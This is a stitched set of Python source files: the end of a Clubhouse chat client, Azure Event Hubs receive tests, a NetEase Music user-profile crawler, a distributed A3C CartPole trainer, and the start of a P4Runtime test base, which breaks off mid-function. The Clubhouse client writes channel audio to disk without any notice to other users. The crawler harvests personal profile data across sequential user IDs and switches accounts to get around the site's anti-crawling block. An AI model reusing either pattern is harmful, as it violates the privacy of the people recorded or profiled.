    Main function for chat: joins the channel named in sys.argv[1], lists
    its users, starts audio (if agorartc is available), keeps the session
    alive, and optionally raises a hand for speaker permission.
    """
    max_limit = 20
    channel_speaker_permission = False
    _wait_func = None
    _ping_func = None
    def _request_speaker_permission(client, channel_name, user_id):
        """ (str) -> bool
        Raise hands for permissions
        """
        # NOTE(review): `_wait_func` is assigned here without a `nonlocal`
        # declaration, so this binds a *local* name -- the cleanup code at
        # the bottom of chat_main never sees the timer and cannot .set() it.
        if not channel_speaker_permission:
            client.audience_reply(channel_name, True, False)
            _wait_func = _wait_speaker_permission(
                client, channel_name, user_id)
            print(
                "[/] You've raised your hand. Wait for the moderator to give you the permission.")
    @set_interval(30)
    def _ping_keep_alive(client, channel_name):
        """ (str) -> bool
        Continue to ping alive every 30 seconds.
        """
        client.active_ping(channel_name)
        return True
    @set_interval(10)
    def _wait_speaker_permission(client, channel_name, user_id):
        """ (str) -> bool
        Function that runs when you've requested for a voice permission.
        Returns False (stopping the interval) once the invite is accepted.
        """
        # Get some random users from the channel.
        _channel_info = client.get_channel(channel_name)
        if _channel_info['success']:
            for _user in _channel_info['users']:
                if _user['user_id'] != user_id:
                    user_id = _user['user_id']
                    break
            # Check if the moderator allowed your request.
            res_inv = client.accept_speaker_invite(channel_name, user_id)
            if res_inv['success']:
                print("[-] Now you have a speaker permission.")
                print("    Please re-join this channel to activate a permission.")
                return False
        return True
    # Choose which channel to enter.
    # Join the talk on success.
    user_id = client.HEADERS.get("CH-UserID")
    print_channel_list(client, max_limit)
    time.sleep(3)
    channel_name = sys.argv[1]
    channel_info = client.join_channel(channel_name)
    if not channel_info['success']:
        # Check if this channel_name was taken from the link
        channel_info = client.join_channel(channel_name, "link", "e30=")
        if not channel_info['success']:
            print(
                f"[-] Error while joining the channel ({channel_info['error_message']})")
            return
    # List currently available users (TOP 20 only.)
    # Also, check for the current user's speaker permission.
    channel_speaker_permission = False
    console = Console()
    table = Table(show_header=True, header_style="bold magenta")
    table.add_column("user_id", style="cyan", justify="right")
    table.add_column("username")
    table.add_column("name")
    table.add_column("is_speaker")
    table.add_column("is_moderator")
    users = channel_info['users']
    i = 0
    for user in users:
        i += 1
        if i > max_limit:
            break
        table.add_row(
            str(user['user_id']),
            str(user['name']),
            str(user['username']),
            str(user['is_speaker']),
            str(user['is_moderator']),
        )
        # Check if the user is the speaker
        if user['user_id'] == int(user_id):
            channel_speaker_permission = bool(user['is_speaker'])
    console.print(table)
    # Check for the voice level.
    if RTC:
        token = channel_info['token']
        RTC.joinChannel(token, channel_name, "", int(user_id))
        RTC.startAudioRecording(
            "./data/" + channel_info['topic'] + ".wav", 32000, 2)
    else:
        print("[!] Agora SDK is not installed.")
        print("    You may not speak or listen to the conversation.")
    # Activate pinging
    client.active_ping(channel_name)
    _ping_func = _ping_keep_alive(client, channel_name)
    _wait_func = None
    # Add raise_hands key bindings for speaker permission
    # Sorry for the bad quality
    # NOTE(review): `_hotkey` is only bound for darwin/win32 -- on any other
    # platform the f-string below raises NameError. Confirm target platforms.
    if not channel_speaker_permission:
        if sys.platform == "darwin": # OSX
            _hotkey = "9"
        elif sys.platform == "win32": # Windows
            _hotkey = "ctrl+shift+h"
        print(
            f"[*] Press [{_hotkey}] to raise your hands for the speaker permission.")
        keyboard.add_hotkey(
            _hotkey,
            _request_speaker_permission,
            args=(client, channel_name, user_id)
        )
    # Poll the channel until we are told to leave or the call fails.
    while True:
        time.sleep(100)
        channel_info = client.get_channel(channel_name)
        if channel_info['should_leave'] == True or channel_info['success'] == False:
            break
    # Safely leave the channel upon quitting the channel.
    if _ping_func:
        _ping_func.set()
    if _wait_func:
        _wait_func.set()
    if RTC:
        RTC.leaveChannel()
        RTC.stopAudioRecording()
    client.leave_channel(channel_name)
def user_authentication(client):
    """ (Clubhouse) -> NoneType
    Just for authenticating the user: phone-number + SMS-code flow, then
    saves the credentials with write_config and runs onboarding if needed.
    """
    result = None
    while True:
        user_phone_number = input(
            "[.] Please enter your phone number. (+818043217654) > ")
        result = client.start_phone_number_auth(user_phone_number)
        if not result['success']:
            print(
                f"[-] Error occured during authentication. ({result['error_message']})")
            continue
        break
    result = None
    while True:
        verification_code = input(
            "[.] Please enter the SMS verification code (1234, 0000, ...) > ")
        result = client.complete_phone_number_auth(
            user_phone_number, verification_code)
        if not result['success']:
            print(
                f"[-] Error occured during authentication. ({result['error_message']})")
            continue
        break
    user_id = result['user_profile']['user_id']
    user_token = result['auth_token']
    user_device = client.HEADERS.get("CH-DeviceId")
    write_config(user_id, user_token, user_device)
    print("[.] Writing configuration file complete.")
    if result['is_waitlisted']:
        print("[!] You're still on the waitlist. Find your friends to get yourself in.")
        return
    # Authenticate user first and start doing something
    client = Clubhouse(
        user_id=user_id,
        user_token=user_token,
        user_device=user_device
    )
    if result['is_onboarding']:
        process_onboarding(client)
    return
def main():
    """
    Initialize required configurations, start with some basic stuff.
    Loads saved credentials; authenticated users go straight to chat,
    otherwise runs the phone-auth flow and restarts.
    """
    # Initialize configuration
    client = None
    user_config = read_config()
    user_id = user_config.get('user_id')
    user_token = user_config.get('user_token')
    user_device = user_config.get('user_device')
    # Check if user is authenticated
    if user_id and user_token and user_device:
        client = Clubhouse(
            user_id=user_id,
            user_token=user_token,
            user_device=user_device
        )
        # Check if user is still on the waitlist
        _check = client.check_waitlist_status()
        if _check['is_waitlisted']:
            print(
                "[!] You're still on the waitlist. Find your friends to get yourself in.")
            return
        # Check if user has not signed up yet.
        _check = client.me()
        if not _check['user_profile'].get("username"):
            process_onboarding(client)
        chat_main(client)
    else:
        client = Clubhouse()
        user_authentication(client)
        main()  # restart with the freshly written credentials
if __name__ == "__main__":
    try:
        main()
    except Exception:
        # Remove dump files on exit.
        # NOTE(review): the exception itself is swallowed here, so crashes
        # exit silently with status 0 -- consider re-raising after cleanup.
        file_list = os.listdir(".")
        for _file in file_list:
            if _file.endswith(".dmp"):
                os.remove(_file)
|
test_receive.py | #-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import os
import threading
import pytest
import time
import datetime
from azure.eventhub import EventData, TransportType, EventHubConsumerClient
from azure.eventhub.exceptions import EventHubError
@pytest.mark.liveTest
def test_receive_end_of_stream(connstr_senders):
    """Starting at "@latest" must deliver nothing until a new event is sent."""
    def on_event(partition_context, event):
        if partition_context.partition_id == "0":
            assert event.body_as_str() == "Receiving only a single event"
            assert list(event.body)[0] == b"Receiving only a single event"
            on_event.called = True
    on_event.called = False
    connection_str, senders = connstr_senders
    client = EventHubConsumerClient.from_connection_string(connection_str, consumer_group='$default')
    with client:
        thread = threading.Thread(target=client.receive, args=(on_event,),
                                  kwargs={"partition_id": "0", "starting_position": "@latest"})
        thread.daemon = True
        thread.start()
        # No event exists past "@latest" yet, so the callback must not fire.
        time.sleep(10)
        assert on_event.called is False
        senders[0].send(EventData(b"Receiving only a single event"))
        time.sleep(10)
        assert on_event.called is True
    thread.join()
@pytest.mark.parametrize("position, inclusive, expected_result",
                         [("offset", False, "Exclusive"),
                          ("offset", True, "Inclusive"),
                          ("sequence", False, "Exclusive"),
                          ("sequence", True, "Inclusive"),
                          ("enqueued_time", False, "Exclusive")])
@pytest.mark.liveTest
def test_receive_with_event_position_sync(connstr_senders, position, inclusive, expected_result):
    """Record an event position of each kind, then restart from it and check
    inclusive/exclusive semantics via the body of the first event seen."""
    def on_event(partition_context, event):
        # last_enqueued_event_properties must track the event just delivered.
        assert partition_context.last_enqueued_event_properties.get('sequence_number') == event.sequence_number
        assert partition_context.last_enqueued_event_properties.get('offset') == event.offset
        assert partition_context.last_enqueued_event_properties.get('enqueued_time') == event.enqueued_time
        assert partition_context.last_enqueued_event_properties.get('retrieval_time') is not None
        if position == "offset":
            on_event.event_position = event.offset
        elif position == "sequence":
            on_event.event_position = event.sequence_number
        else:
            on_event.event_position = event.enqueued_time
        on_event.event = event
    on_event.event_position = None
    connection_str, senders = connstr_senders
    senders[0].send(EventData(b"Inclusive"))
    senders[1].send(EventData(b"Inclusive"))
    client = EventHubConsumerClient.from_connection_string(connection_str, consumer_group='$default')
    with client:
        thread = threading.Thread(target=client.receive, args=(on_event,),
                                  kwargs={"starting_position": "-1",
                                          "starting_position_inclusive": inclusive,
                                          "track_last_enqueued_event_properties": True})
        thread.daemon = True
        thread.start()
        time.sleep(10)
        assert on_event.event_position is not None
    thread.join()
    senders[0].send(EventData(expected_result))
    senders[1].send(EventData(expected_result))
    client2 = EventHubConsumerClient.from_connection_string(connection_str, consumer_group='$default')
    with client2:
        thread = threading.Thread(target=client2.receive, args=(on_event,),
                                  kwargs={"starting_position": on_event.event_position,
                                          "starting_position_inclusive": inclusive,
                                          "track_last_enqueued_event_properties": True})
        thread.daemon = True
        thread.start()
        time.sleep(10)
        assert on_event.event.body_as_str() == expected_result
    thread.join()
@pytest.mark.liveTest
def test_receive_owner_level(connstr_senders):
    """A second consumer with a higher owner_level must evict the first one,
    which should surface an EventHubError via its on_error callback."""
    def on_event(partition_context, event):
        pass
    def on_error(partition_context, error):
        on_error.error = error
    on_error.error = None
    connection_str, senders = connstr_senders
    client1 = EventHubConsumerClient.from_connection_string(connection_str, consumer_group='$default')
    client2 = EventHubConsumerClient.from_connection_string(connection_str, consumer_group='$default')
    with client1, client2:
        thread1 = threading.Thread(target=client1.receive, args=(on_event,),
                                   kwargs={"partition_id": "0", "starting_position": "-1",
                                           "on_error": on_error})
        thread1.start()
        for i in range(5):
            ed = EventData("Event Number {}".format(i))
            senders[0].send(ed)
        time.sleep(10)
        # owner_level=1 outranks client1's default, forcing a disconnect.
        thread2 = threading.Thread(target=client2.receive, args=(on_event,),
                                   kwargs = {"partition_id": "0", "starting_position": "-1", "owner_level": 1})
        thread2.start()
        for i in range(5):
            ed = EventData("Event Number {}".format(i))
            senders[0].send(ed)
        time.sleep(20)
    thread1.join()
    thread2.join()
    assert isinstance(on_error.error, EventHubError)
@pytest.mark.liveTest
def test_receive_over_websocket_sync(connstr_senders):
    """Receive over AMQP-over-WebSocket and verify AMQP properties
    (application properties, content type, correlation/message ids) survive."""
    app_prop = {"raw_prop": "raw_value"}
    content_type = "text/plain"
    message_id_base = "mess_id_sample_"
    def on_event(partition_context, event):
        on_event.received.append(event)
        on_event.app_prop = event.properties
    on_event.received = []
    on_event.app_prop = None
    connection_str, senders = connstr_senders
    client = EventHubConsumerClient.from_connection_string(connection_str,
                                                           consumer_group='$default',
                                                           transport_type=TransportType.AmqpOverWebsocket)
    # Five events sent in one batch ...
    event_list = []
    for i in range(5):
        ed = EventData("Event Number {}".format(i))
        ed.properties = app_prop
        ed.content_type = content_type
        ed.correlation_id = message_id_base
        ed.message_id = message_id_base + str(i)
        event_list.append(ed)
    senders[0].send(event_list)
    # ... plus one sent individually: six total expected.
    single_ed = EventData("Event Number {}".format(6))
    single_ed.properties = app_prop
    single_ed.content_type = content_type
    single_ed.correlation_id = message_id_base
    single_ed.message_id = message_id_base + str(6)
    senders[0].send(single_ed)
    with client:
        thread = threading.Thread(target=client.receive, args=(on_event,),
                                  kwargs={"partition_id": "0", "starting_position": "-1"})
        thread.start()
        time.sleep(10)
        assert len(on_event.received) == 6
        for ed in on_event.received:
            assert ed.correlation_id == message_id_base
            assert message_id_base in ed.message_id
            assert ed.content_type == "text/plain"
            assert ed.properties[b"raw_prop"] == b"raw_value"
|
craw_user.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: betta
'''
netease music api
'''
from api import NetEase
import MySQLdb
import time
import sys
import threading
from change_user import change_user
cookie_path = "~/.netease-music_api/cookie"
# login: create the API client and switch to a working account
joker = NetEase()
login_info = change_user()
print login_info
def save2sql(conn, data):
    # Persist one user-detail payload from the NetEase API into MySQL.
    # Errors are printed and swallowed so the crawl loop keeps going.
    cur = conn.cursor()
    if data:
        try:
            sql = (
                "INSERT INTO netease_music_users (user_id, nick_name, signature, user_type, gender, follows, followeds, province, city, avatar_url, background_url, level, listen_songs, vip_type, expert_tags, people_can_see_playrecord, birthday) "
                "VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
            )
            # birthday arrives in epoch milliseconds; <= 0 means "unset".
            if data['profile']['birthday'] > 0:
                time_tmp = time.localtime(data['profile']['birthday']/1000)
                birthday = time.strftime("%Y-%m-%d %H:%M:%S", time_tmp)
            else:
                birthday = "1970-01-02 00:00:00"
            if data['profile']['expertTags']:
                expert_tags = '-'.join(data['profile']['expertTags'])
            else:
                expert_tags = ''
            sql_data = (data['profile']['userId'], data['profile']['nickname'], data['profile']['signature'], data['profile']['userType'], data['profile']['gender'], data['profile']['follows'],\
                        data['profile']['followeds'], data['profile']['province'], data['profile']['city'], data['profile']['avatarUrl'], data['profile']['backgroundUrl'],\
                        data['level'], data['listenSongs'], data['profile']['vipType'], expert_tags, data['peopleCanSeeMyPlayRecord'], birthday)
            print sql_data
            cur.execute(sql, sql_data)
            conn.commit()
        except Exception, e:
            print Exception, ":", e
def craw(start, limit):
    # Crawl user ids in [start, start+limit) and store each profile.
    # One MySQL connection per worker thread.
    print 'sub thread start!the thread name is:%s ' % threading.currentThread().getName()
    conn = MySQLdb.Connect(host = '127.0.0.1',
                           user = 'root',
                           passwd = 'root',
                           db = 'netease',
                           charset = 'utf8')
    # (historic queries kept for reference)
    # #sql = "SELECT song_id from netease_music_songs where id > (select song_id from netease_music_comments order by id desc limit 1)"
    # sql = "SELECT song_id from netease_music_songs where id > 186664 order by id "
    # cur.execute(sql)
    # result=cur.fetchall()
    for s in range(start, start+limit):
        print "user_id %s" % (s)
        detail = joker.user_detail(s)
        print detail
        print 'sub thread start!the thread name is:%s ' % threading.currentThread().getName()
        if detail.get('code') == -460:
            # -460: the API flagged this session -- rotate to another account.
            print 'change user'
            try:
                change_user()
            except Exception, e:
                print Exception, ":", e
        elif detail.get('code') == 200:
            save2sql(conn, detail)
        else:
            print "no detail %s" % (s)
        # Throttle to one request per second to stay under rate limits.
        time.sleep(1)
    conn.close()
# class MyThread(threading.Thread):
# """
# 属性:
# target: 传入外部函数, 用户线程调用
# args: 函数参数
# """
# def __init__(self, target, args):
# super(MyThread, self).__init__() #调用父类的构造函数
# self.target = target
# self.args = args
# def run(self) :
# self.target(self.args)
def main():
    """Split the id range across 10 daemon crawler threads and wait for them.
    Usage: craw_user.py <start_id> <per_thread_limit>"""
    start_number = int(sys.argv[1])
    limit_number = int(sys.argv[2])
    thread_list = []  # holds the worker threads
    for i in xrange(10):
        t =threading.Thread(target=craw,args=(start_number+i*limit_number, limit_number))
        t.setDaemon(True)
        thread_list.append(t)
    for t in thread_list:
        t.start()
    for t in thread_list:
        t.join()
if __name__ == '__main__':
    main()
|
A3C_distributed_tf.py | """
Asynchronous Advantage Actor Critic (A3C) with discrete action space, Reinforcement Learning.
The Cartpole example using distributed tensorflow + multiprocessing.
View more on my tutorial page: https://morvanzhou.github.io/
"""
import multiprocessing as mp
import tensorflow as tf
import numpy as np
import gym, time
import matplotlib.pyplot as plt
UPDATE_GLOBAL_ITER = 10
GAMMA = 0.9
ENTROPY_BETA = 0.001
LR_A = 0.001 # learning rate for actor
LR_C = 0.001 # learning rate for critic
env = gym.make('CartPole-v0')
N_S = env.observation_space.shape[0]
N_A = env.action_space.n
class ACNet(object):
    """Actor-Critic network.  Built once as the shared 'global_net' (params
    only) and once per worker as a local net that syncs with the global one
    via pull (copy global params) and push (apply local gradients)."""
    # Injected by the worker once the MonitoredTrainingSession exists.
    sess = None
    def __init__(self, scope, opt_a=None, opt_c=None, global_net=None):
        if scope == 'global_net': # get global network
            with tf.variable_scope(scope):
                self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
                # Global net only holds parameters; losses live on workers.
                self.a_params, self.c_params = self._build_net(scope)[-2:]
        else:
            with tf.variable_scope(scope):
                self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
                self.a_his = tf.placeholder(tf.int32, [None, ], 'A')
                self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
                self.a_prob, self.v, self.a_params, self.c_params = self._build_net(scope)
                td = tf.subtract(self.v_target, self.v, name='TD_error')
                with tf.name_scope('c_loss'):
                    self.c_loss = tf.reduce_mean(tf.square(td))
                with tf.name_scope('a_loss'):
                    log_prob = tf.reduce_sum(
                        tf.log(self.a_prob) * tf.one_hot(self.a_his, N_A, dtype=tf.float32),
                        axis=1, keep_dims=True)
                    exp_v = log_prob * td
                    entropy = -tf.reduce_sum(self.a_prob * tf.log(self.a_prob + 1e-5),
                                             axis=1, keep_dims=True) # encourage exploration
                    self.exp_v = ENTROPY_BETA * entropy + exp_v
                    self.a_loss = tf.reduce_mean(-self.exp_v)
                with tf.name_scope('local_grad'):
                    self.a_grads = tf.gradients(self.a_loss, self.a_params)
                    self.c_grads = tf.gradients(self.c_loss, self.c_params)
                self.global_step = tf.train.get_or_create_global_step()
            with tf.name_scope('sync'):
                with tf.name_scope('pull'):
                    self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, global_net.a_params)]
                    self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, global_net.c_params)]
                with tf.name_scope('push'):
                    self.update_a_op = opt_a.apply_gradients(zip(self.a_grads, global_net.a_params), global_step=self.global_step)
                    self.update_c_op = opt_c.apply_gradients(zip(self.c_grads, global_net.c_params))
    def _build_net(self, scope):
        """Build actor (softmax policy) and critic (state value) heads."""
        w_init = tf.random_normal_initializer(0., .1)
        with tf.variable_scope('actor'):
            l_a = tf.layers.dense(self.s, 200, tf.nn.relu6, kernel_initializer=w_init, name='la')
            a_prob = tf.layers.dense(l_a, N_A, tf.nn.softmax, kernel_initializer=w_init, name='ap')
        with tf.variable_scope('critic'):
            l_c = tf.layers.dense(self.s, 100, tf.nn.relu6, kernel_initializer=w_init, name='lc')
            v = tf.layers.dense(l_c, 1, kernel_initializer=w_init, name='v') # state value
        a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
        c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
        return a_prob, v, a_params, c_params
    def choose_action(self, s): # run by a local
        """Sample an action from the current policy for state *s*."""
        prob_weights = self.sess.run(self.a_prob, feed_dict={self.s: s[np.newaxis, :]})
        action = np.random.choice(range(prob_weights.shape[1]),
                                  p=prob_weights.ravel()) # select action w.r.t the actions prob
        return action
    def update_global(self, feed_dict): # run by a local
        """Apply locally computed gradients to the global network."""
        self.sess.run([self.update_a_op, self.update_c_op], feed_dict) # local grads applies to global net
    def pull_global(self): # run by a local
        """Copy the global network's parameters into this local network."""
        self.sess.run([self.pull_a_params_op, self.pull_c_params_op])
def work(job_name, task_index, global_ep, lock, r_queue, global_running_r):
    """Process entry point: run either a parameter server (blocks forever)
    or an A3C worker that trains CartPole until 1000 global episodes."""
    # set work's ip:port
    cluster = tf.train.ClusterSpec({
        "ps": ['localhost:2220', 'localhost:2221',],
        "worker": ['localhost:2222', 'localhost:2223', 'localhost:2224', 'localhost:2225',]
    })
    server = tf.train.Server(cluster, job_name=job_name, task_index=task_index)
    if job_name == 'ps':
        print('Start Parameter Sever: ', task_index)
        server.join()
    else:
        t1 = time.time()
        env = gym.make('CartPole-v0').unwrapped
        print('Start Worker: ', task_index)
        # Variables are placed on the ps jobs; ops stay on this worker.
        with tf.device(tf.train.replica_device_setter(
                worker_device="/job:worker/task:%d" % task_index,
                cluster=cluster)):
            opt_a = tf.train.RMSPropOptimizer(LR_A, name='opt_a')
            opt_c = tf.train.RMSPropOptimizer(LR_C, name='opt_c')
            global_net = ACNet('global_net')
            local_net = ACNet('local_ac%d' % task_index, opt_a, opt_c, global_net)
        # set training steps
        hooks = [tf.train.StopAtStepHook(last_step=100000)]
        with tf.train.MonitoredTrainingSession(master=server.target,
                                               is_chief=True,
                                               hooks=hooks,) as sess:
            print('Start Worker Session: ', task_index)
            local_net.sess = sess
            total_step = 1
            buffer_s, buffer_a, buffer_r = [], [], []
            while (not sess.should_stop()) and (global_ep.value < 1000):
                s = env.reset()
                ep_r = 0
                while True:
                    # if task_index:
                    #     env.render()
                    a = local_net.choose_action(s)
                    s_, r, done, info = env.step(a)
                    if done: r = -5.
                    ep_r += r
                    buffer_s.append(s)
                    buffer_a.append(a)
                    buffer_r.append(r)
                    if total_step % UPDATE_GLOBAL_ITER == 0 or done: # update global and assign to local net
                        if done:
                            v_s_ = 0 # terminal
                        else:
                            v_s_ = sess.run(local_net.v, {local_net.s: s_[np.newaxis, :]})[0, 0]
                        # Bootstrapped n-step returns, computed backwards.
                        buffer_v_target = []
                        for r in buffer_r[::-1]: # reverse buffer r
                            v_s_ = r + GAMMA * v_s_
                            buffer_v_target.append(v_s_)
                        buffer_v_target.reverse()
                        buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.array(buffer_a), np.vstack(
                            buffer_v_target)
                        feed_dict = {
                            local_net.s: buffer_s,
                            local_net.a_his: buffer_a,
                            local_net.v_target: buffer_v_target,
                        }
                        local_net.update_global(feed_dict)
                        buffer_s, buffer_a, buffer_r = [], [], []
                        local_net.pull_global()
                    s = s_
                    total_step += 1
                    if done:
                        # Exponential moving average of episode reward.
                        if r_queue.empty(): # record running episode reward
                            global_running_r.value = ep_r
                        else:
                            global_running_r.value = .99 * global_running_r.value + 0.01 * ep_r
                        r_queue.put(global_running_r.value)
                        print(
                            "Task: %i" % task_index,
                            "| Ep: %i" % global_ep.value,
                            "| Ep_r: %i" % global_running_r.value,
                            "| Global_step: %i" % sess.run(local_net.global_step),
                        )
                        with lock:
                            global_ep.value += 1
                        break
        print('Worker Done: ', task_index, time.time()-t1)
if __name__ == "__main__":
    # use multiprocessing to create a local cluster with 2 parameter servers and 2 workers
    global_ep = mp.Value('i', 0)          # shared episode counter
    lock = mp.Lock()                      # guards global_ep increments
    r_queue = mp.Queue()                  # stream of running-reward samples
    global_running_r = mp.Value('d', 0)   # shared moving-average reward
    jobs = [
        ('ps', 0), ('ps', 1),
        ('worker', 0), ('worker', 1), ('worker', 2), ('worker', 3)
    ]
    ps = [mp.Process(target=work, args=(j, i, global_ep, lock, r_queue, global_running_r), ) for j, i in jobs]
    [p.start() for p in ps]
    # Join only the workers; the parameter servers block forever by design.
    [p.join() for p in ps[2:]]
    ep_r = []
    while not r_queue.empty():
        ep_r.append(r_queue.get())
    plt.plot(np.arange(len(ep_r)), ep_r)
    plt.title('Distributed training')
    plt.xlabel('Step')
    plt.ylabel('Total moving reward')
    plt.show()
|
base_test.py | # Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Antonin Bas (antonin@barefootnetworks.com)
#
#
import Queue
import sys
import threading
import time
from StringIO import StringIO
from collections import Counter
from functools import wraps, partial
from unittest import SkipTest
import google.protobuf.text_format
import grpc
import ptf
import ptf.testutils as testutils
import scapy.packet
import scapy.utils
from google.rpc import status_pb2, code_pb2
from p4.config.v1 import p4info_pb2
from p4.v1 import p4runtime_pb2
from ptf import config
from ptf.base_tests import BaseTest
from ptf.dataplane import match_exp_pkt
# See https://gist.github.com/carymrobbins/8940382
# functools.partialmethod is introduced in Python 3.4
class partialmethod(partial):
    """Backport of functools.partialmethod (added in Python 3.4) for
    Python 2: a partial that binds the instance on attribute access."""
    def __get__(self, instance, owner):
        if instance is None:
            # Accessed on the class itself -- behave like an unbound partial.
            return self
        return partial(self.func, instance,
                       *(self.args or ()), **(self.keywords or {}))
# Convert integer (with length) to binary byte string
# Equivalent to Python 3.2 int.to_bytes
# See
# https://stackoverflow.com/questions/16022556/has-python-3-to-bytes-been-back-ported-to-python-2-7
def stringify(n, length):
    """Convert integer *n* to a big-endian binary string of *length* bytes.
    Python 2 only: relies on str.decode('hex') (removed in Python 3)."""
    h = '%x' % n
    # Pad to an even number of hex digits, then to the requested width.
    s = ('0' * (len(h) % 2) + h).zfill(length * 2).decode('hex')
    return s
def ipv4_to_binary(addr):
    """Convert a dotted-quad IPv4 string to its 4-byte string form."""
    octets = addr.split('.')
    return "".join(chr(int(octet, 10)) for octet in octets)
def mac_to_binary(addr):
    """Convert a colon-separated MAC address string to its 6-byte string form."""
    octets = addr.split(':')
    return "".join(chr(int(octet, 16)) for octet in octets)
def format_pkt_match(received_pkt, expected_pkt):
    # Returns a human-readable dump (scapy dissection + hexdump) of both the
    # expected and the received packet, for inclusion in failure messages.
    # NOTE: Python 2 print statements; stdout is temporarily swapped because
    # the scapy helpers print directly to stdout.
    # Taken from PTF dataplane class
    stdout_save = sys.stdout
    try:
        # The scapy packet dissection methods print directly to stdout,
        # so we have to redirect stdout to a string.
        sys.stdout = StringIO()
        print "========== EXPECTED =========="
        if isinstance(expected_pkt, scapy.packet.Packet):
            scapy.packet.ls(expected_pkt)
            print '--'
        scapy.utils.hexdump(expected_pkt)
        print "========== RECEIVED =========="
        if isinstance(received_pkt, scapy.packet.Packet):
            scapy.packet.ls(received_pkt)
            print '--'
        scapy.utils.hexdump(received_pkt)
        print "=============================="
        # The return expression is evaluated before the finally block closes
        # the StringIO, so this is safe.
        return sys.stdout.getvalue()
    finally:
        sys.stdout.close()
        sys.stdout = stdout_save  # Restore the original stdout.
# Used to indicate that the gRPC error Status object returned by the server has
# an incorrect format.
class P4RuntimeErrorFormatException(Exception):
    """Raised when the server's gRPC error Status cannot be parsed."""
    def __init__(self, message):
        super(P4RuntimeErrorFormatException, self).__init__(message)
# Used to iterate over the p4.Error messages in a gRPC error Status object
class P4RuntimeErrorIterator:
    """Iterator over the non-OK p4.Error messages nested in a gRPC error.

    The server encodes a google.rpc.Status in the "grpc-status-details-bin"
    trailing metadata; each Any in its `details` field unpacks to a p4.Error
    (one per update in the write batch). Iteration yields (batch index,
    p4.Error) for every entry whose canonical code is not OK.

    Raises P4RuntimeErrorFormatException if the metadata is missing or empty.
    NOTE: Python 2 iterator protocol (`next`); a `__next__` alias is provided
    for forward compatibility.
    """

    def __init__(self, grpc_error):
        assert (grpc_error.code() == grpc.StatusCode.UNKNOWN)
        self.grpc_error = grpc_error
        error = None
        # The gRPC Python package does not have a convenient way to access the
        # binary details for the error: they are treated as trailing metadata.
        for meta in self.grpc_error.trailing_metadata():
            if meta[0] == "grpc-status-details-bin":
                error = status_pb2.Status()
                error.ParseFromString(meta[1])
                break
        if error is None:
            raise P4RuntimeErrorFormatException("No binary details field")
        if len(error.details) == 0:
            raise P4RuntimeErrorFormatException(
                "Binary details field has empty Any details repeated field")
        self.errors = error.details
        self.idx = 0

    def __iter__(self):
        return self

    def next(self):
        while self.idx < len(self.errors):
            p4_error = p4runtime_pb2.Error()
            one_error_any = self.errors[self.idx]
            if not one_error_any.Unpack(p4_error):
                raise P4RuntimeErrorFormatException(
                    "Cannot convert Any message to p4.Error")
            # BUG FIX: advance the index *before* the OK check. The original
            # code did `continue` without incrementing self.idx, which looped
            # forever as soon as one entry had canonical_code == OK.
            idx = self.idx
            self.idx += 1
            if p4_error.canonical_code == code_pb2.OK:
                continue
            return idx, p4_error
        raise StopIteration

    # Python 3 compatibility alias.
    __next__ = next
# P4Runtime uses a 3-level message in case of an error during the processing of
# a write batch. This means that if we do not wrap the grpc.RpcError inside a
# custom exception, we can end-up with a non-helpful exception message in case
# of failure as only the first level will be printed. In this custom exception
# class, we extract the nested error message (one for each operation included in
# the batch) in order to print error code + user-facing message. See P4 Runtime
# documentation for more details on error-reporting.
class P4RuntimeWriteException(Exception):
    """Wraps a gRPC UNKNOWN error from a Write RPC.

    self.errors holds (batch index, p4.Error) tuples for every failed update
    in the batch, extracted via P4RuntimeErrorIterator.
    """
    def __init__(self, grpc_error):
        assert (grpc_error.code() == grpc.StatusCode.UNKNOWN)
        super(P4RuntimeWriteException, self).__init__()
        self.errors = []
        try:
            error_iterator = P4RuntimeErrorIterator(grpc_error)
            for error_tuple in error_iterator:
                self.errors.append(error_tuple)
        except P4RuntimeErrorFormatException:
            raise  # just propagate exception for now

    def __str__(self):
        # One line per failed update: its batch index, canonical code name,
        # and the server-provided message.
        message = "Error(s) during Write:\n"
        for idx, p4_error in self.errors:
            code_name = code_pb2._CODE.values_by_number[
                p4_error.canonical_code].name
            message += "\t* At index {}: {}, '{}'\n".format(
                idx, code_name, p4_error.message)
        return message
# This code is common to all tests. setUp() is invoked at the beginning of the
# test and tearDown is called at the end, no matter whether the test passed /
# failed / errored.
# noinspection PyUnresolvedReferences
class P4RuntimeTest(BaseTest):
def setUp(self):
    """Set up the PTF dataplane, connect to the P4Runtime server, load the
    p4info file and open the arbitration stream.

    Required test params: device_id, cpu_port, p4info; optional: grpcaddr
    (defaults to localhost:50051) and pltfm ('hw' skips @skip_on_hw tests).
    """
    BaseTest.setUp(self)
    # Setting up PTF dataplane
    self.dataplane = ptf.dataplane_instance
    self.dataplane.flush()
    self._swports = []
    for device, port, ifname in config["interfaces"]:
        self._swports.append(port)
    grpc_addr = testutils.test_param_get("grpcaddr")
    if grpc_addr is None:
        grpc_addr = 'localhost:50051'
    # BUG FIX: check for a missing test param *before* converting to int.
    # The original called int(...) on the raw param, so a missing param
    # raised TypeError and the self.fail(...) branch was unreachable.
    device_id = testutils.test_param_get("device_id")
    if device_id is None:
        self.fail("Device ID is not set")
    self.device_id = int(device_id)
    cpu_port = testutils.test_param_get("cpu_port")
    if cpu_port is None:
